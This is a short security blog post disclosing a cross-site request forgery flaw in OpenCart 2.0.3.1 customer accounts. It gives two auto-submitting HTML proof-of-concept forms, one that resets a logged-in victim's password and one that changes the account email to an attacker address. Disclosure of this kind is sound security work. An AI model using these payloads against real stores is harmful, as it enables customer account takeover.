web analytics

OpenCart 2.0.3.1 Cross Site Request Forgery Vulnerability

Posted By

Vulnerability not resolved since 2013

openCart

What is OpenCart

OpenCart is a turn-key ready “out of the box” shopping cart solution. You simply install, select your template, add products and you’re ready to start accepting orders. It has order management and multiple payment gateways already built in and we provide lifetime free support and free software updates. Open Source.

OpenCart 2.0.3.1 has been found to be vulnerable against cross site request forgery vulnerability. While CSRF protection exists for the actions of an admin, it does not exist for customers. This means that customer accounts can be compromised by an attacker if the victim visits an attacker controlled website while logged in.

Proof that it works

Change Password 


<form name="myform" method="post" action="http://localhost/opencart-2.0.3.1/upload/index.php?route=account/password" > <input type="hidden" name="password" value="12345"> <input type="hidden" name="confirm" value="12345"> </form> <script>document.myform.submit();</script>

Change Profile Information 

<form name="myform" method="post" action="http://localhost/opencart-2.0.3.1/upload/index.php?route=account/edit" > <input type="hidden" name="currency" value="USD"> <input type="hidden" name="language" value="en"> <input type="hidden" name="firstname" value="Jane"> <input type="hidden" name="lastname" value="Smith"> <input type="hidden" name="email" value="attacker@evil.com"> <input type="hidden" name="telephone" value="1234567"> </form> <script>document.myform.submit();</script>

Author: Shivniel Gounder

TheGeek : Writes about information security, privacy, cybersecurity and latest tech gadgets and more.

Share This Post On

Submit a Comment

This site uses Akismet to reduce spam. Learn how your comment data is processed.

%d bloggers like this: